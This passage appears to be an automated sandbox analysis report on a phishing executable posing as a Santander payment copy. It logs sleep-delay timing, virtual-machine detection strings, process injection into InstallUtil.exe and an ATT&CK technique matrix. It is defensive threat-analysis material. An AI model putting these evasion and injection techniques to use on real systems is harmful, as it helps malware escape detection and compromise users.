                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -99555s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -99430s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -99315s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -99190s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -99047s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -98937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -98826s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -98714s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -98603s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -98493s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -98383s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -98271s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -98143s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -98016s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -97904s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -97792s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -97680s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -97568s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -97441s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -97314s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -97202s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -97090s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -96978s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -96868s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -96756s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -96628s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -96500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -96388s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -96277s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -96165s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -96053s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -95928s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -95801s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -95674s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -95546s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -95434s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -95323s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -95211s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -95099s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -94971s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -94844s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -94732s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -94620s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -94508s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2852Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1728Thread sleep count: 9857 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2852Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 99889Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 99777Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 99666Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 99555Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 99430Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 99315Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 99190Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 99047Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 98937Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 98826Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 98714Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 98603Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 98493Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 98383Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 98271Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 98143Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 98016Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 97904Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 97792Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 97680Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 97568Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 97441Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 97314Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 97202Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 97090Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 96978Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 96868Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 96756Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 96628Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 96500Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 96388Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 96277Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 96165Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 96053Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 95928Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 95801Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 95674Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 95546Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 95434Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 95323Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 95211Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 95099Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 94971Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 94844Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 94732Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 94620Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 94508Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30000Jump to behavior
                    Source: InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|Xen4win32_process.handle='{0}'
                    Source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1563050163.00000000032D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
                    Source: InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1562213216.0000000001229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                    Source: InstallUtil.exe, 0000000A.00000002.2408067431.0000000000775000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Allocates memory in foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 580000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 580000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 580000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 582000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5EA000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5EC000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3BD008Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		311
                    Process Injection                    		1
                    Disable or Modify Tools                    		OS Credential Dumping11
                    Security Software Discovery                    		Remote Services11
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		31
                    Virtualization/Sandbox Evasion                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		311
                    Process Injection                    		Security Account Manager31
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Deobfuscate/Decode Files or Information                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
